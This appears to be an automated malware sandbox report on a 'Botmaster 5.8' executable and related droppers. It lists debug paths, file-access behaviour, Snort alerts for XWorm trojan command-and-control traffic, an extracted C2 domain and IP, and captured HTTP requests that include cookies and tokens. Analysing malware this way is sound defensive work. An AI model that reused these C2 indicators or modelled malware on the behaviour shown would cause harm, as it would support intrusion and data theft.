                  Source: Binary string: D:\a\_work\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2197563960.00000000042B6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdba source: Botmaster 5.8 direct.exe, 00000008.00000003.2197563960.00000000042B6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\karim\Downloads\BotMaster5.8\Botmaster\obj\Debug\BotMaster.pdb source: BotMaster.exe, 0000001A.00000000.2266898531.0000000000FC6000.00000002.00000001.01000000.0000000D.sdmp
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2200775339.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2204364074.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: am Files (x86)\Bot Master\Bot Master\BotMaster.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2191011931.00000000009AA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: DotNetZip\obj\Release\DotNetZip.pdb source: aspnet_compiler.exe, 00000009.00000002.3705490557.0000000006CC0000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.3681287686.0000000003B60000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053102955.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.0000000004738000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2157680311.0000000003462000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2353065439.0000000004109000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdbSHA256 source: Botmaster 5.8 direct.exe, 00000008.00000003.2204364074.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/net461-Release/System.Text.Encodings.Web.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2202463761.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: XClient.exe, 0000000C.00000000.2114700259.0000000000812000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2201256888.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\third_party\edge_webview2\win\winforms_control\Microsoft.Web.WebView2.WinForms\obj\release\net45\Microsoft.Web.WebView2.WinForms.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2197123799.00000000042B6000.00000004.00000020.00020000.00000000.sdmp, BotMaster.exe, BotMaster.exe, 0000001A.00000002.3724204302.0000000005B52000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053102955.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.0000000004738000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2157680311.0000000003462000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2353065439.0000000004109000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/net461-Release/System.Text.Encodings.Web.pdbSHA256 source: Botmaster 5.8 direct.exe, 00000008.00000003.2202463761.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2191241194.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2194488233.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2193559861.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2191596922.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2197642159.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2200134465.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2194002510.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2195584992.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2197447745.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2196317439.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2201712883.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2196671374.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2197233269.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2196999002.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2202952523.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2192256439.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2199029817.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2202241552.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2192759324.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2201947621.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2200600569.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2198445992.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2191767847.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2200817353.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2192584569.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2191413727.00000000009AA000.00000004.00
                  Source: Binary string: am Files (x86)\Bot Master\Bot Master\BotMaster.pdbmanif source: Botmaster 5.8 direct.exe, 00000008.00000003.2191011931.00000000009AA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WebView2Loader.dll.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2199738423.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2199389979.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2200092245.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.pdb1> source: Botmaster 5.8 direct.exe, 00000008.00000002.2275007655.0000000000633000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256^Y source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_0041C085 wcsncpy,wcslen,wcscat,GetDriveTypeW,FindFirstFileW,FindClose,GetFileAttributesW,GetDriveTypeW,8_2_0041C085
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeCode function: 8_2_0041C1F3 wcsncpy,wcslen,wcscat,wcscpy,FindFirstFileW,wcscmp,wcscpy,wcscat,FindFirstFileW,wcscpy,wcscat,wcscmp,wcscmp,FindNextFileW,FindClose,wcscpy,wcscat,FindFirstFileW,SetFileAttributesW,wcscpy,wcscat,wcscmp,wcscmp,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,8_2_0041C1F3
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]26_2_0BD00BB4
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then movzx eax, byte ptr [01694F54h]26_2_0BD00B84
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then movzx eax, byte ptr [01694F51h]26_2_0BD00B84
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then mov ecx, dword ptr [ebp-54h]26_2_0BD00B84
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]26_2_0BD0A138
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]26_2_0BD0A127
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]26_2_0BD04E18
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]26_2_0BD04608
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]26_2_0BD04E28
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then mov esp, ebp26_2_0BD03598
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then mov esp, ebp26_2_0BD03588
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]26_2_0C035AD1
                  Source: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]26_2_0C036300

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2853192 ETPRO TROJAN Win32/XWorm V3 CnC Command - sendPlugin Outbound 192.168.2.4:49734 -> 209.25.140.212:15762
                  Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 209.25.140.212:15762 -> 192.168.2.4:49734
                  Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.4:49734 -> 209.25.140.212:15762
                  Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 209.25.140.212:15762 -> 192.168.2.4:49734
                  Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.4:49734 -> 209.25.140.212:15762
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: title-formula.at.ply.gg
                  Connects to many ports of the same IP (likely port scanning)
                  Source: global trafficTCP traffic: 209.25.140.212 ports 15762,1,2,5,6,7
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.4:49734 -> 209.25.140.212:15762
                  Source: global trafficHTTP traffic detected: GET /api/v2/getwapi.ashx?key=Ju9SWyJu9WQwgnmtZo7m2meGaJg8ciMVZGByC HTTP/1.1Host: botmaster.mediaplus.meConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 204.79.197.239 204.79.197.239
                  Source: Joe Sandbox ViewIP Address: 172.64.41.3 172.64.41.3
                  Source: Joe Sandbox ViewASN Name: COGECO-PEER1CA COGECO-PEER1CA
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: web.whatsapp.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.whatsapp.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /app-a89b2a183fe14aa356cb.css HTTP/1.1Host: web.whatsapp.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://web.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gs
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yI/l/0,cross/C2fHuK6eV5E.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.whatsapp.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yb/l/0,cross/0n-rMIA_g6I.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.whatsapp.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yx/l/0,cross/_K0hEQYGPlg.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.whatsapp.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /v/t39.8562-34/317094452_674406960787691_2379683082953204863_n.png?ccb=1-7&_nc_sid=73b08c&_nc_ohc=oR3xu8RL-Y8AX-4ifa9&_nc_ht=scontent.whatsapp.net&oh=01_AdT3h8Ax7apLe18qhzUe-P1f9GTqK1ua1QGMyu3-SLk1Zw&oe=65F20528 HTTP/1.1Host: scontent.whatsapp.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: POST /api/browser/edge/data/toptraffic/3 HTTP/1.1Host: data-edge.smartscreen.microsoft.comConnection: keep-aliveContent-Length: 754Accept: application/octet-stream;application/x-patch-bsdiff;Authorization: SmartScreenHash eyJhdXRoSWQiOiJjMmU0ZjljYS1lZjYwLTQyY2EtOTAyZi1mNzgwZTFmMTk2YTciLCAia2V5IjoickpZVUI4c044UXlRVXRxMHIwTEhodz09IiwgImhhc2giOiJldU5uM2lBWkJtaz0ifQ==Content-Type: application/json; charset=utf-8If-None-Match: "170540185939602997400506234197983529371"Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, br
                  Source: global trafficHTTP traffic detected: POST /api/browser/edge/data/bloomfilter/x/3 HTTP/1.1Host: data-edge.smartscreen.microsoft.comConnection: keep-aliveContent-Length: 754Accept: application/octet-stream;application/x-patch-bsdiff;Authorization: SmartScreenHash eyJhdXRoSWQiOiJjMmU0ZjljYS1lZjYwLTQyY2EtOTAyZi1mNzgwZTFmMTk2YTciLCAia2V5IjoickpZVUI4c044UXlRVXRxMHIwTEhodz09IiwgImhhc2giOiJldU5uM2lBWkJtaz0ifQ==Content-Type: application/json; charset=utf-8If-None-Match: "636976985063396749.rel.v2"Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, br
                  Source: global trafficHTTP traffic detected: POST /api/browser/edge/data/settings/3 HTTP/1.1Host: data-edge.smartscreen.microsoft.comConnection: keep-aliveContent-Length: 726Accept: application/octet-stream;application/x-patch-bsdiff;Authorization: SmartScreenHash eyJhdXRoSWQiOiJjMmU0ZjljYS1lZjYwLTQyY2EtOTAyZi1mNzgwZTFmMTk2YTciLCAia2V5IjoiRWMrdUZuNGZ4ckVyaVBIMHdIRmlwQT09IiwgImhhc2giOiJLR3dVeWR3bUdxST0ifQ==Content-Type: application/json; charset=utf-8If-None-Match: "2.0-0"Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, br
                  Source: global trafficHTTP traffic detected: POST /wa_qpl_data HTTP/1.1Host: graph.whatsapp.netConnection: keep-aliveContent-Length: 1185sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfnqh0ldmvfVBiBstAccept: */*Origin: https://web.whatsapp.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://web.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                  Source: global trafficHTTP traffic detected: GET /ws/chat HTTP/1.1Host: web.whatsapp.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Upgrade: websocketOrigin: https://web.whatsapp.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gsSec-WebSocket-Key: KnIcaFPv2DOKiufKDszV5Q==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                  Source: global trafficHTTP traffic detected: GET /ws/chat HTTP/1.1Host: web.whatsapp.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Upgrade: websocketOrigin: https://web.whatsapp.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gsSec-WebSocket-Key: qL2A+XHMyKyLf8i3ZVUwIA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                  Source: global trafficHTTP traffic detected: GET /ws/chat HTTP/1.1Host: web.whatsapp.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Upgrade: websocketOrigin: https://web.whatsapp.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gsSec-WebSocket-Key: tHyZpMHuCa2yekMex+wUTg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                  Source: global trafficHTTP traffic detected: POST /componentupdater/api/v1/update?cup2key=6:DGgYcGaw9n72ofxa1bSuHARKsVbWbDHIqW7qaa1jqQo&cup2hreq=9bd91ebdf36ce1eabda79246ea8837da44429b5fd34d7ec7853cf1db632b35c7 HTTP/1.1Host: edge.microsoft.comConnection: keep-aliveContent-Length: 4923X-Microsoft-Update-AppId: kpfehajjjbbcifeehjgfgnabifknmdad,oankkpibpaokgecfckkdkgaoafllipag,eeobbhfgfagbclfofmgbdfoicabjdbkn,ohckeflnhegojcjlcpbfpciadgikcohk,fppmbhmldokgmleojlplaaodlkibgikh,fgbafbciocncjfbbonhocjaohoknlaco,ahmaebgpfccdhgidjaidaoojjcijckba,alpjnmnfbgfkmmpcfpejmmoebdndedno,ndikpojcjlepofdkaaldkinkjbeeebkl,jbfaflocpnkhbgcijpkiafdpbjkedane,ojblfafjmiikbkepnnolpgbbhejhlcimX-Microsoft-Update-Interactivity: bgX-Microsoft-Update-Service-Cohort: 7912X-Microsoft-Update-Updater: msedge-117.0.2045.47Content-Type: application/jsonSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 1X-Client-Data: CLv3ygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, br
                  Source: global trafficHTTP traffic detected: GET /ws/chat HTTP/1.1Host: web.whatsapp.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Upgrade: websocketOrigin: https://web.whatsapp.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wa_lang_pref=en; wa_csrf=2uN016RqtMoaxc2Gn2y_gsSec-WebSocket-Key: 1wgP648fMest6+AY5jmUYg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                  Source: global trafficHTTP traffic detected: POST /wa_fls_upload_check?type=crashlog&access_token=1063127757113399%7C745146ffa34413f9dbb5469f5370b7af HTTP/1.1Host: crashlogs.whatsapp.netConnection: keep-aliveContent-Length: 636sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117", "Microsoft Edge WebView2";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFCLnhzuJaG5Kx792Accept: */*Origin: https://web.whatsapp.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://web.whatsapp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
